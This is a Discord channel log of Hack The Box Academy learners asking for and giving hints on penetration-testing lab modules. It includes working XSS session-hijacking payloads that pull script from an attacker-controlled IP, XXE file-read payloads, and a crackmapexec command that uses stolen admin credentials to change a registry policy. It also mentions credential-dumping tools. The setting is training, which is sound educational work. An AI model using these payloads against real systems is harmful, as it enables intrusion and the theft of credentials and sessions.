#modules

hmmm well i can try that. am i supposed to mount it on the target machine or do you think i can use my machine with a vbox to open it?

I need assistance , ive tried so many ways

mount on local machine for sure

ill give that a shot and come back if i cant figure it out

Are you doing this through evil-winrm?

I tried via evil-winrm but the via the pth attack via the Administrator account doesnt produce the relevant kerberos ticket due to the why i auth

and no luck on cracking the hash

Ive be stuck working through that dang webshell

even when tunneling via proxychains and chisel lo luck with GetUserSpns or secretsdump

and back on the web shell my original LOL method to collect the SPN's and tickets via setspn thrown the error of the missing assembly

It's...wild

@.@

Even after porting mimikatz over i can privilege::debug but sekurlsa::tickets /export throws an error

that nither module in found

oh and PowerView/SharpView.... just refuse to work most likley due to that missing assembly situation

Unless Im just bad lol

oh bro lfg. thanks man

idk what lfg means here but 👍

lets fucking go

lol got it

DM me.

I'm in the credential hunting in Windows and I can't seem to get anywhere. I tried using lazagne.exe and it didn't find anything and findstr isn't finding anything useful either. Any hints with this one would be really helpful.

Also, lazagne keeps closing on me so I have very limited time to search through it before it closes.

are you runnign it through a terminal? or just clicking the icon?

I'm running it through the terminal.

try putting a -v at the end

I even tried with -vv and it still just completes and closes.

I'm going to try restarting the instance.

I even started a new instance and I'm running into the same problem. lazagne opens and runs and then closes after completing.

I was able to stop it by clicking in the window and found a password for gitlab but it says it's the wrong one. I'm really not sure what I'm doing wrong here.

Okay, I found a file with the first two answers. I still can't get lazagne to work properly. Any ideas why it just closes? Reinstalling it doesn't help either.

paste this in google or any of your browser: file:///C:/Users/ZaD_MINI07/Downloads/Untitled%20document%20(1).pdf

very nice

Created today xDDD

?

It doesn't work for u?

damn it

aight i'll try to share it a diff way

awww cmon who deleted it?

I tried using lazagne on the pwnbox as well and I have the same issue there I've always had. The rdp into the Windows box crashes and I then can't get xfreerdp to restart.

Are you high? Also what does this have to do with modules? read the #rules and checkout #welcome

I've been looking for previous posts of them for the Skill Assessment for Command injection, and couldn't find any. any guidance you can give on this? I
So I resolved it, but got it in an unexpected way. I did not use the filters ||&,|,;|| which I would've never guessed without trying countless scenarios by accident. This was not so obvious. Did anyone else out there use those filters to solve this one?

You can dm me.

Okay, now the rdp session into the Windows machine even through my VM crashes and won't let me restart it. Is anyone else having issues with rdping into the provided vulnerable box?

@red current accept me as friend I’ll help

Thank you, userxfi. I just have the last question left to go.

K check dm

Send me a message

@red current ^^^

is getting message Malicious request denied! close to solving Command Injection?

it can be

its telling you something in your payload is being blocked

if you can narrow it down and then remove it, you can try other things

Ive not noticed this, but Im pretty sure some of the writers are indeed english 2nd language.

I have to give them credit because they’re somewhat better at communicating than the more-skilled members of my university’s cybersecurity club, despite being native English speakers, lol

well if your running a business and service training cyber security they should be good at explaining and teaching the subject

If anyone has done the active directory bloodhound module I could use some help! I am on the very last question in the skills assessment

actually got it

hello

was wondering if i could get some help with XSS module

i am doing the session hijacking part

and i can't figure out why none of the payloads are sending any request to the server

'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>```

i used the following payloads and no luck

no sure what i am doing wrong

oh

nvm

Please keep this channel on topic.

sorry

is this the channel help for module questions?

or is there another one

wher you are going to inject this in? url box?

Wasn't directed at you 🙂

ok ty <3

it was a portal to register

so input box

turned out i was trying all the suggested ones in the module

and the correct one wasn't the mentioned one

are you sure input box doesn't use sanitize function?

not for that module i assume

or at least not for that input

there was multiple one's to try the payloads on

use tampermonkey

the correct wasn't mentioned in the steps in the modules so i just skipped it

but it was the vulnerable one

i will add to my tool list ty for the suggestion <3

is there any jquery module? because you used $.getScript function.

not for that module

maybe later down the road

i found the correct one in the module

refrain from posting spoilers such as that in the chat :)

oki ma mbad

like you said you were able to find the right payload with a little digging, so I'm sure other people are just as capable :D

unless they are not good with Google Fu

lol

google

what would we do

without it

am i right?

In which case Hacking in general is not for you if you don't know how to google

and coding in general

commputer in general

just stick to sticks and stones

those can break bones yaknow

but GL and HH :)

learned that the hard way

tyty <3

by the way, you can do real hacking with greasemonkey or tampermonkey. by bypassing csp (Content Security Policy)

while that is true; HTB is focused on the whitehat side of things with redteaming more in mind; where you are doing sanctioned hacking

isn't it!? I guess we would never reuse an id_rsa...but these silly sys admins we're up against might 😉

you'd be surprised in an enterprise environment

:)

I gotta use Google more and chatgpt less

lol me too, though I find chatgpt so helpful to explain concepts that aren't so clear in the modules

chatgpt can often be confidently incorrect

true but still a amazing supplementary study aid

It can easily become a crutch tho so I gotta be careful

Also; taking breaks is OK to do

nothing like a good sleep to get the mind thinking smoothly again

if you're getting frustrated on something that seems simple - take a break and come back

100%

Can't tell you how many times i've stepped away, come back and saw the answer was right in front of me

sometimes literally, plaintext

Attacking Authentication Mechanisms module question:
In the section "Weak Public/Private Keys" I'm not able to import the certificates into SAML Raide Certificates. It just shows the error message: "Error reading file. (signed overrun, bytes = 466)".
Did anyone faced the same issue?

i think there's a not fully written question in module FILE INCLUSION page PHP Wrappers

that is a fully written question ... it is asking you to gain RCE and the read the flag at directory "/"

oh thanks in previous sections it said some specific directory with words so thats why i got confused

to clarify the single slash is not a directory itself but path to it

ok thanks

# Module: **Attacking Common Applications**
## Section: **WordPress - Discovery & Enumeration**
### Question: *Enumerate the host and find a flag.txt flag in an accessible directory.*

I have solved other 2 questions but have no clue how to get this one any nudges would be helpful, also i tried to read the src code but found nothing effective, Thanks in advance```

navigate the website and check the source

Can someone help me with a slight hint in module FILE INCLUSION page PHP Wrapper. I can't figure it out the question is: Try to gain RCE using one of the PHP wrappers and read the flag at /

find a way to issue commands on the target, for example a command that can list files/directories and then use a different command to get the output of the contents of a file

ok thanks i will try

hello can someone help me in community help about attacking web applications with ffuf please ?

Hi all. I am really stuck in Miscellaneous Techniques on Linux Privesc Module... Im finding it a non sense from the explanation to the question... Could anyone help me? Thanks

can I know the HTB academy price per year ?
including teir3 ||| and all modules @red obsidian

@autumn pilot Hey sorry for disturbing you but I still can't figure it out, I can display /etc/passwd and id but i cant understand what am I suposed to do and what to use to do it.

The file is somewhere in /

hei guys

can someone help me?

someone please?

Hi guys. I just finished Pivoting, Tunneling, and Port Forwarding Skills Assessment.

After getting the credentials for v**** how was I to know that the last host was on 172.16.6.** instead of 172.16.5.***?

is there any way of actually gaining cubes other than buying them?

When you get access to a machine, it's a good idea to run ipconfig/ifconfig, to see what all interfaces are on the machine.

The new 'HTB Seasons' that were announced seem to have cube rewards, at certain ranks.

okay i just rechecked. Normally thats the first thing i do. This time i obviously forgot that. 🙃 Thanks

Hi all, I'm a beginner,
can I start directly with the penetration tester path ? or should I look into something else before?

I've read the "learn-to-hack-beginners-bible" and I found there that beginner should learn:

1. Networking
2. Linux
3. Windows
4. Bash scripting
5. A scripting language (like Python)

The only think I do not have in this list is Networking knowledge. In the rest (2 to 5) I'm an expert

Guys after getting student subscription will i be able to fulfill cubes for job role path ?

there are Intro to Networking, Windows, and Linux. I'd recommend starting there. It won't hurt and chances are you'll learn something new

for both CBBH and CPTS, if you have the student subscription you have access to the entire course. Once the subscription ends though you will lose access (unless you fully completed the module).

you don't get cubes with the student subscription

^ forget to mention that. You will be able to do the courses, but don't get any cubes from the subscription. Completing the modules still gives cubes

which module would be an intro to Networking please?

the one that has the name "intro to networking"

I'd do Intro to Networking and maybe Intro to Network Traffic Analysis as well

Guys hello,i am in FOOTPRINTING EASY lab. I saw user:pass provided but want to do that without it. Did Hydra with ftp_betterdefaultpassword.txt and top usernames ,but no luck. Can someone help me?(Nevermind,i found,rockyou and 10k-most common wordlists helped)

I Found it, thanks

@autumn pilot man i start feeling stupid but i still can't get it i've been trying and i just cant understand i do ../ so that i can go to suposedly / then i try flag or flag.txt and nothing. It's probably something simple but my mind cant think of it

Can I be a mod? Pleasseeee🥺 😢

list the files in the / directory

maybe thats where my problem is coming from i cant figure out how

are you using the examples in the section

yes

this is enough for you to execute commands, and eventually list files

yes i tried to read flag.txt or /etc/passwd for example but nothing happens i just dont understand how the whole command works

the thing is that the file is not called flag.txt

and the RCE is basic linux commands

Just a curiosity question:
How are (Intro to Networking and Network Traffic Analysis) compared to a ccna stuff ?

I've never done CCNA so I can't answer that

okay network+ maybe? or any other networking certification?

haven't taken them.

alright, so they are not necessary to be good at hacking right?

you don't really need any cert to be "good at hacking"

imo certs are really just a way to show off what you know and bypass some basic interview questions/tests

not saying certs are bad, but you can still be good at something without them.

nice thanks

i use "ls" and nothing needed pops out i tried few other commands like pwd but i only got to some files with the extensions from the website and the source

take a break, and after the break go through the things again

a hint - the command from the section's examples is working

Hi All.
I am doing the CrackMapExec Module on HTB Academy and have noticed some typo's in some of the texts. Where is the best place to feedback this?

#858470491676737536

Can someone give me a nudge please?

nudge -> you can access the share through the target without the need to mount it on your machine

thanks my G

Got a problem with Linux Fundamentals module

What is the type of the service of the "syslog.service"?

This module just got updated tho

can someone help me with the footprinting module footprinting lab -medium: Enumerate the server carefully and find the username "HTB" and its password. Then, submit this user's password as the answer.

I have got the admin account and im in the datbase but i have no clue how to get the password

hi

can someone help me with this question

im stuck as it has rate limit

and there is no anti csrf token

Can someone help me with the File Upload Attacks module, Limited File Uploads section. I sent the xxe payload in burp and uploaded it to the target and can see a list of directories in the source code but cant interact with them. Can someone give me a hint please?

Module broken authentication section brute forcing passwords

you can use this payload with the file name dont forget directory for example to fetch files from root directory we can use /file.txt

Thank you for the prompt reply.

Im using that xxe payload: <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

I'm just not sure how to modify this section of it: "file:///etc/passwd"> ]

/etc/passwd is a file in linux

i have to delete my text as it contains the answer part.. i hope it helped u

Thank you! I was trying to provide a full path instead of just the file name.

welcome :))

i hope somebody helps me too

HI

you can dm me

i need help with broken authentication module can sm1 help me

How can figure out the type of service syslog.service is??

The second question im stuck on as well. I view the source code with the following script:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

It gives me a long base64 string.

Then I used burp decoder to decode it:

<?php
libxml_disable_entity_loader(false);

$svg_file = file_get_contents('./images/' . file_get_contents('./images/latest.xml'));
$doc = new DOMDocument();
$doc->loadXML($svg_file, LIBXML_NOENT | LIBXML_DTDLOAD);
$svg = $doc->getElementsByTagName('svg');Cj8

Am I doing this incorrectly? I still dont see an uploads directory?

you have the answer already

you have to use the directory name as answer

answer is in this php code

Anyone done the Live Engagement lab from Shells and Payloads module?

It could be the worst lab I have done in HTB due to the foothold machine is bad.

It should really be reworked

I have done it. It is a little unfortunately made. It could be reworked to spread the boxes over like the Easy, Medium and Hard challenges you might find in a different module. The biggest hurdle is working with the linux machine you have to log into.

If you need help, DM me

Not sure if I'm the only one but the Password attack module just drains all energy out of me

It is a lot of waiting indeed 😆

It's a true test of discipline. I spent 2 days max per module. I've been on this for 5 days now. Still waiting for the Hydra to crack the Easy machine.

@autumn pilot I did it man i found it thanks for the help and for not giving me the answer but making me think

anyone know the wordlist for Password Module - Easy? is it the ||mutated|| one? with username.list?

I just managed to finish almost 80% of it. I had to do a restart to the box and give it few extra minutes to finish setting up the environment.
But I completely agree with your suggestion of spreading it into three separate tasks. It’s a fun task to do but compared to the new refreshed labs, htb should redesign it.

For those of you who have done it, what do you guyz think of OSINT: Corporate Recon module? IDK if I should spend 1000 cubes on it lmaoo

Password Attacks/Pass the Ticket from Windows: cannot RDP via xfreerdp or evil-winrm, I thought I might have to go in an disablerestrictedadmin, but i cannot get in evil-winrm...am i missing something here?

try with the ||password.list||

You are correct, with the credentials they give you, you must make that change and then pass the ticket

restart the machine or check that the credentials are correctly written

ok, im gonna reset the machine and see if that helps...thanks bro

HI, I am stuck in the last question of "Bloodhound - Skills Assessment", Q: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78). Can someone help me please ?

I haven't worked through the new module yet, but this cheat sheet helped me at the time
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/

hi could someone help me with the task 11 on the box called Appointment on starting point tier 1?
i did a SQL injection and got in the website, then got the root password but when i answered this question it always shows the answer as wrong so i cant enter the root flag at task 12
i'll send some screenshots of my tries (the first one with admin'# worked on the website so idk why it doesnt accept it here)

also my bad if this is the wrong place to ask for help on these starting point stuff, im not 100% sure where to ask ngl

It's asking for the words that are on the web page, isn't it? Not the injection you used.

oh i think i might've missunderstood the question, thanks lol i'll try that

And I think you want #boxes

This is for questions on the modules at HTB Academy.

yep thanks alot for the help man i'll use there if i need any help i apreciate the help alot

Took me two weeks but I finally finished the footprinting module

🫠

@hv7 You still stuck on imap/pop3?

any one do AD Enumeration & Attacks - Skills Assessment Part II can help me with question 6 " Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file? "

Hi, I need help with the subscription to HTB on the portal. Clicking on the HTB Support leads to just discord opening and I am not sure where to ask for help. Could someone point me in the right direction?

use the chat bubble detail here https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

hint use what you have to enum other existed machine on the network

In Attacking Common Applications, Splunk module, the server is not responding even when I have restarted it several times (and yes, I have tried to access to it on ports 8000 or 8090, where Splunk is usually running, and is running [used Nmap on it]) 🤔

you mean Attacking Common Applications?

oh, yes, erratum there

if you are in the Splunk - Discovery & Enumeration section the website should be on port 8000 if you can't see it maybe give the target a few min to fully booted up

Yes, I mean, the sections are simple. But I guess I'll just wait

Thank you

i just give it a quick try and right when the target is up there is nothing running on port 8000 but after like 2 min i can access Splunk on it

also you access it with https right?

Yep, it spawned finally. Took longer than usual, but well. Ty for the help

AD Enumeration & Attacks - Skills Assessment Part I .. I can't get the password of the user on MS01 .. I tried lazagne and tried finding it manually using findstr .. No luck .. any hints?

Which question are you on?

Find cleartext credentials for another domain user. Submit the username as your answer.

i already figured it out because of seeing dates and i knew who the use is

rn im actually gonna dump ths S** for hashes and see if I can make it

May I ask why the jump boxes (particularly linux ones) are mostly with resolution that was quite popular in 2003-2004?

if you think that with this resolution is easy to read stuff, then I should consider buying an old CRT monitor

HI
I'm stuck in Password Attacks Lab - Medium
I'm logged in with user Dennis but can't find how to privesc to root.
Apparently the solution is in Dennis' home directory, I tried to reuse the ssh key but I don't know the passphrase. I did try to crack it but no wordlist gives me the password.

there is no need to crack it, just simply try to find a way to see what this user might have done and repeat it

we see that he adds his public key in the authorized keys but I don't have the passphrase to reuse his key

you don't need it

I don't see what I can do

the most basic thing

you can SSH

I must not be wide awake but if I try to connect with the key it asks me for a passphrase that I do not know

you don't need to copy the key

well if I take the history and I redo my own key it is just valid for dennis but not for root. I don't see how to login in ssh with root

all I can say is that you are more than half-way there

it was necessary to crack the passphrase of the key. it's just that I already had another key on my desktop from another module and I was not trying the right key ...

Hey, after dumping it I still couldn't find the clear text credentials .. can you help ?

Use || mimikatz ||

Already did and it, that's how I got the NT hash

when i tried cracking it i didn't get the credentials

The password is displayed in plain text. You can not crack it

I sent u a screenshot prv to see what i meant

How do I server files from Windows without downloading a tool like impacket?

just finished the footprinting module, gotta say that was a hard one.

what kind of an access do you have on the target (windows machine?)

I finished the Introduction to Academy yesterday and I definitely can say that I will be using this program daily from now on. ❤️

Hi ! I am working on Attacking Enterprise Networks - Web Enumeration & Exploitation

I can't manage to access the gitlab subdomain, it always redirects me to port 8081

Does someone had the same issue ? I tried to restart the instance several times

On nmap nothing shows up on port 8081

And port 8080 is the support host

Buit when i use curl I can see a redirection to the user directory, which whem directly requested works

is this

the general chat

where is general chat

I am stuck on broken authentication predictable reser token question 1
I tried editing reset_token_time.py to generate the token. It keeps failing.
I manually tried creating the token with time difference +-1 but it also keeps failing

Nothing wrong with the instance it does that not sure why though. Something with Gitlab

<@&861185840277487616>

UAT IU SEI

spik gud england laik me'

alwer (929775749785849876) has been banned until 2023-06-04 13:52:31 (UTC).

Thank you

try in an incognito tab

Anyone here who can help me in Precious machine??

Hello guys , i have an question related to XSS reflected

What the attacker can do if he found xss vulnerability

As an attacker way not as a pentester

who did the passwords attacks module recently? i need to ask a question of a section i just completed but i didnt understand how it fully worked lol

(in the PassTheHash section)

what is the question?

i completed the exercise where it asks me to make a rev shell but i didnt understand why it worked

You are basically executing commands using the credentials you had over the DC which is another machine

To sum it up a bit more clearly, you act on behalf of X user on Y machine, and do a Z action

i was kinda confused cuz dont you already have julio DC01 hash to make pth?

in fact i tried directly to get the txt content by just navigating to julio's folders but didnt find the folder containing that txt, when i did the rev shell it was there instead

Try comparing the hostnames and ip addresses

so the julio hash that i have are on the MS01 and the rev shell made me connect to the julio on DC01?

yes

oh perfect

thank you! haha i was getting a bit confused

Can anyone assist with the CrackMapExec Module

I am trying to run the command
crackmapexec smb 10.129.121.154 -u robert -p Inlanefreight01! --computers
to get the answer to Q2
But i am getting the error
Error enumerating domain computers using dc ip 10.129.121.154: unsupported hash type MD4

I'm kind of stuck in the active subdomain enumeration section of information gathering - web edition. the first question was easy, the second q I'm not 100% sure if my reasoning was correct but the answer was accepted. q3 I was kinda just throwing things at the wall to see if something would stick, if you know what I mean. 🙂 been stuck at q4 for hours now

Hi. Can anyone help me with "Getting Started Privilge Escalation" ? I have made it to user2 and find id_rsa. But i have no clue how to copy the file id_rsa to my machine without the password from user2. I tried scp, python http server and I copied the content of the id_rsa and created a file on my computer with the same name and content. If i try to connect ... ||└─$ ssh user2@165.227.228.154 -p 30076 -i id_rsa
Load key "id_rsa": Permission denied||

HI,
On Password Attacks Lab - Hard
I can't find a wordlist that works to connect in rdp. I'm using crackmapexec apparently it should use the mutated list but it doesn't give me anything.
I tried I'm not sure of the user if it's johanna or Johanna but with both it doesn't work, I tried several lists and rockyou has been running for a while

The wordlist is the ||mut_password||, what configuration are you using with crackmapexec?

It's strange i have the good list.
I'm use this command :
crackmapexec rdp 10.129.62.124 -u johanna -p mut_password.list

use winrm RDP is slow as hell

winrm --local-auth

and its||mu||

try with ||crackmapexec winrm ip + user + mut_password --local-auth||

With the default configuration of crackmapexec I was not able to get johanna's credential, that's why adding|| --local-auth|| can get the credential

it doesn't return anything to me either

nah bro its

in the || mutated. || must be something wrong with your list

This hard lab is a tough one. You'll be cracking more passwords later so make sure to fix your file

I have 94044 word.
I will rebuilt it

try that and recheck the name for Johanna

Also, you shouldn't take too long johanna's password

It's the same i have 94044 word.

I have restart the box and this time is good ...
Thanks @cunning marsh and @opaque niche 😉

bruteforcing smb, winrm; bloodhound data, rpcclient enum; kerbrute and etc

^^ no problem

I'm stuck on initial foothold in the medium lab of password attacks. I tried the provided usernames & passwords but no hits so far. Any hints?

What lists are you using for usernames and passwords?

The provided ones from the course username.list and password.list

With those two lists + hydra you should have no problem getting the credentials, try restarting the machine or downloading the files again

Should these creds work on smb? As i'm currently using SSH because I'm getting false positive results with crackmapexec on smb

I do not recommend using ssh as it is slow to look up credentials, if I remember correctly use ||smb|| to get the credentials with the lists mentioned in|| hydra||

I did not use crackmapexec because I tried with|| hydra|| first and it worked

Did you compile hydra with smb2 support? As I'm getting an smb error, that's the reason i'm using cme

what command are you using?

Hey friend !!!
i'm stuck here
Password Attack Lab -Medium
Examine the second target and submit the contents of flag.txt in /root/ as the answer.

i'm in jason user , don't know further , for denish and root access

hello, can i send a photo throught this chat? I can´t understand one thing and I'd wish someone could help me

hint check what is running locally on that target machine

you need to verify your account first use ++verify at #bot-commands

i think i can't verify since i'm still in htb academy

im new tho

can i send a link for the community help channel where i posted my question?

Hello everyone, i'm new in this scope and i was trying to have some starting course, i've had a look at tryhackme but then i found hackthebox, do you know if there are some free courses to get started and test something with my hands in hackthebox? and if yes could you please redirect me where are those courses?

I'm also new and im starting through HTB academy, once I finished the Introduction, I went into WEB Requests

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

appreciate!

^^

here give both of these video a check
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4

because this discord mainly for HTB main platform you need an account there to verify your discord account

aah okay

thanks for the info

wow that last footprint lab is pretty tough ngl. Had to use and|| IMAP ||syntax hint. Took forever to find ||SNMP.||

tcm security has a great PNPT course. HTB is more challenging IMHO.

ooops!! tunneling and chiseling!! I think....

Thank you for the link it was helpful!

Hello, can someone lend me a hand with Attacking Common Applications – Skills Assessment 1 please? I was able to get RCE via ||http://10.129.201.89:8080/cgi/cmd.bat?&dir|| but no commands other than ‘dir’ work. I’m not sure what to do now, I’ve tried multiple commands with no results.

try to look for the CVE and then look at the examples

use "type" command to read the flag

and if it dont work url encode the payload and try again

I've already tried both those things on a file located in the directory I landed at but I'm not getting any output

@steady hawk i think i lied to you, my notes are awful 😂

sorry

https://discord.com/channels/473760315293696010/1082369119992692836

its a redirection to a question in the community-help channel

On the "Abusing HTTP Misconfigurations" module I have completed everything but, "Bypassing Flawed Validation". Any tips on this one? Seems like it might be one of the easier ones but I'm stuck on it.

If you are still stuck, try configuring a mail client on your attack box with the creds you know.

anyone available for a dm on the last question in AD Attacks and Enum, Living off the Land? has to do with dsquery and ldap but don't want to spoil

How long does it take to crack Notes.zip in Protected Archives? I am half tempted to take this to my main OS and use a GPU.

Its obvious rockyou is not the way and previously mutated passwords from given file ETA 2 days ? I mean, is there a reason to make it this difficult time consuming to show case a methodology?!

you're given a wordlist to use throughout the entirety of Password Attacks. You shouldn't need or use any other wordlists

https://giphy.com/gifs/moodman-hes-right-you-know-MdXl4KwZogSzAn6Xx4

Using said password list along with other mutated lists from it

other mutated lists? you should have just been asked to create one using the rule.list and hashcat

sorry custom.rule

Already tried that one, box expired before it finished

So I decided to create (smaller lists) from it

what are you using to crack it?

Tried john and hashcat

Im about to just take it to my host and use my gpu

dont do hashcat. and did you put it into a hashable format before attempting to crack?

Yes of course

whats they hash per second speed when trying to crack it?

my vm isnt using a gpu and it was able to find it fairly quickly

I honestly need to look again. I really just wanted to make sure im not crazy 🤷‍♂️

Ill just use my host. No big deal

nah. if anything since i attempted to modify my passlist too it did create issues. i would try rebuilding it using the command given in the cheatsheet. should be ~94k passwords

Gotcha. Shall give a shot. Thank you!

np

I'm definitely doing something wrong none of these disabled users have descriptions🤔

Hello guys

I wanna know how to know the listning port

Cuz i was working on nibbles htb

After submitting a source port on netcat

Im getting this error

ncat: invalid source port number "n". quitting.

I actually have found creds in description before (in prod) 😁🤷‍♂️

I am working on the Service Enumeration with Nmap. The questions is " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer." I have used Nmap to find all the ports open, I have used Netcat to connect to each port open, I have also used the --packet-trace option like in the module, and used the banner script in Nmap but I am not finding any flag in any of the banners. I have used both the PWNBox as well as my own Kali box connected to the VPN. I have also respawned the box many times, and disconnected/reconnected to the VPN multiple times. I am not finding the flag is there anything else I should be trying I'm not sure what I am missing?

I don’t doubt it. I’m not saying it’s not useful to know, just that I’m doing something wrong to get the right results

Are you dumping from ldapsearch or natively?

using dsquery. That’s what was taught in the module so I’m trying to complete it that way

I’m definitely going to be doing the LDAP module after this

No clue what that is 😁 and not far enough into modules

Or at least never used it

it’s for AD Enum & Attacks, Living off the Land

Ahh

module: footprinting ; section = footprinting Lab - easy. I am having issue accessing the ftp to browse thru it and download files. I had done the following unsusscesful: how did you solve this one? any ideas on what I am doing wrong?

id have to do this one again to figure it out but i dont think getting into ftp was the way to do it.

it says you have to enumerate the target to get the answer. there is a TXT file hidden in the DNS server

I guess I was assuming that because ftp and ssh were available, that I need it to access ftp to obtain the rsa file for the ssh. I got on tunnel vision on that one. Thanks, I'll try to enumerate DNS and look for that file.

no problem. it happens to us all

let me know if you need further assistance with the labs

sure, let me enumerate the DNS and I let you know if I get stuck.

In the Skills Assessment of the Pivoting, Tunneling, and Port Forwarding module, does it make sense that the|| lsass.DMP file seems un-base64-encodable||?

My brain hurts now. The skill assessment took 4 days of working a little at a time and getting crazy frustrated over and over, but I finally finished the Broken Authentication module.

I'm stuck on the sql injections module. I don't really understand this question: We see in the above PHP code that '$conn' is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password.

I followed all the steps in the module, but nothing came back. It didn't talk anything about php. Can someone help me understand?

Is it normal to get a public ip address for the question machine at the end of an exercise?

@dapper temple Yes it is. Sometimes dockers get used so you will get a public IP address for it.

Then how would the container know how to route back and point to my reverse address in my exploit if it's a Private network since its on tun0?

@dapper temple Dockers don't have access to the Internet

But I can browse to the victim machine which the module asks me to spin up. and it has a public address. My VPN is not even on I can reach it.

those challenges rarely if ever need a reverse shell to complete

Password Attacks Lab - Medium
i'm in dennis but , how to go to root

Something in that home folder🤷‍♂️

i have .ssh , so i need to connect via id_rsa or what?

hlo im new

can someone tell me how to remove malware

Honestly, I was stuck on that and decided to do something what everyone should do when get any sort of creds

Does anyone know the fix for using xfreerdp on the Pwnbox? 4:47:32:975] [4734:4734] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.? inb4 someone says just use remmina.

Re-use dont abuse 🤣

😂

export DISPLAY=:1.01 maybe

@cold lake The hard module is actually way better. Has a rhythm to it✌️

tell me for root in medium lab

Literally the biggest hint re-use

okay, i think i got it

bruh i am new and i dont know how to start

#starting-point

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

also #rules and #welcome

Web Services & API Attacks - SOAPAction Spoofing -
Even googling I'm not seeing how I would go about figuring out the architecture of the webserver. Its a 1 or the other question so I've got it but I dont actually understand how I would find that.

Did you end up getting a fix for this apart from using Remmina?

it just ended up working a different day

¯_(ツ)_/¯

also that was 2 months ago; if I did a fix i have since forgotten about it

Yeah, it was a long shot but thought I might ask as popped up in the discord search. And everyone else's fix was to just use Remmina.

Remmina is much more user friendly; all I can say is update your system and everything

but aside from that I have since lost any info on any TS i did

Yes, which of the mobile wallet app are you using?

that has nothing to do with anything skiddie bot

Whats the name of your mobile wallet?

nunya business :)

please read the #rules and #welcome ; and keep this chat on-topic for the academy modules :)

this idiot been messaging everyone

wonder how he's not banned

Guess it's time to bring in the nukes? <@&861185840277487616>

hi

Hi Grey :) @rustic sage has been asking people about what digital wallet they use and apparently messaging people too

Dm me the details if you have them

just scroll up a bit :3 and I guess Axiom may have been dmed about it

I just straight ignore random dms

Stop being a weirdo and stay on topic, if you wish to talk cryptocurrencies this isn't the correct channel and probably not even the correct discord

If he DM'd you please send me the logs/screenshots, so that we have something more to work with

When im bored i reply shrug

Need help on Skills Assessment - File Inclusion. I pretty much know I'm doing right things at the moment. But now the access.log stopped logging anything I do so I can't progress. When I tried poisoning at first with just random string it went through and showed up on the log, but after progressing from there, the log stopped logging anything I do, making the task impossible.

The targets also sometimes randomly crash or freeze on Hackthebox. This seems to happen way too often for a website this big. I have to restart the targets several times for me to once again connect to them.

Most of the time the access.log is too large to send, there are other log files you could try.

Unsure if just having a brain fart, but would like a small nudge.
Webservices & API - Information Disclosure (SQLi)

I've tried using sqlmap + manually sqlinjection. Am I just failing in my manual testing?

wait.....i think I've been attacking the wrong thing ><

and forgot to put /?

can someone please help with Brute Forcing Cookies qusetion 2 in Broken Authentication

What do you mean with "too large to send"? The file is readable on the web site, but it no longer wants to log anything

attacking common service i spawned the machine like 6 times now but everytim the|| 2121 ||port is closed

hint you are on the right path but if you inject something in to the log file that the target web server can't process it will crash everything so if you are using double quotes try single quotes

hint to get the right cookie when logging in you have to ||click something||

yeah this is a known bug, no idea why it keep happening

Password Attacks Lab -Hard
what to do for find Administrator Account pass after you find Johnna password

there is a certain thing (file) that sticks out

find it and think of a way how to break into the file

WEB SERVICE & API ATTACKS - INFORMATION DISCLOSURE (VIA SQLI)

Okay so I've been stuck on this particular one for a couple hours. I've walked through all the databases and I must just be missing the table i'm supposed to be looking into to grab the information on the answer.
Have not been able to find a username with the position of "736373"

I cannot seem to find the place where I can identify user positions just need a bit of help / hint

Where have you tried this password?

attack common services smb i dont get a hit on the given worlist?

for the user jason

the provided password list plus --local-auth if you are using cme

oh yes now i got it thanks

Is it possible to get any support for the CME HTB Academy module ?

depends if you ask a specific question, someone might jump in and assist as long as that someone has done the module or has comprehensive knowledge of cme

it feels like its a bug with the lab.
Trying to run a command from the instructions.
Tested from my machine via the VPN - Timeout
Tested from PwnBox also timeout

[★]$ sudo cme smb 10.129.97.108 -u Administrator -p 'AnotherC0mpl3xP4$$' --local-auth -x "reg add 
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
SMB         10.129.97.108   445    MS01             [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         10.129.97.108   445    MS01             [+] MS01\Administrator:AnotherC0mpl3xP4$$ (Pwn3d!)
ERROR:impacket:Could not connect: timed out

if i test by pinging the lab, its intermittently accessible

Ive tried restarting the target multiple times

Did you do something differently ?

nope, just copy and pasted the command

make sure you don't have an extra new line after reg add

Hey dpgg could I possibly get a small hint. I have UNION injection for Web Services & API Attacks - Inforamtion Disclosure (SQLi).
I have manually looked through everything and I'm not able to find where the positions are stored.

haven't done that module, sorry

Yeah i don't know the command simply does not work for me

same thing every time

and the target intermittently drops off the network

ive tested other commands and they work

so, reset the target, then stop any VPN connection that you have both pwnbox and locally

give it 2-3 minutes and try again

this is from PwnBox currently

and theoretically speaking your command is on one single line, right?

i actually just this second copied it into VSCode and saw its 2 lines

will test again

edit it to be on one single line

worked

thanks @autumn pilot

i swear i am going insane how does mssql work in cli

i cant find anythin from google or it doesnt work

if you are trying to make it execute commands on the system, then you first must ensure that this "operation/operator" is enabled

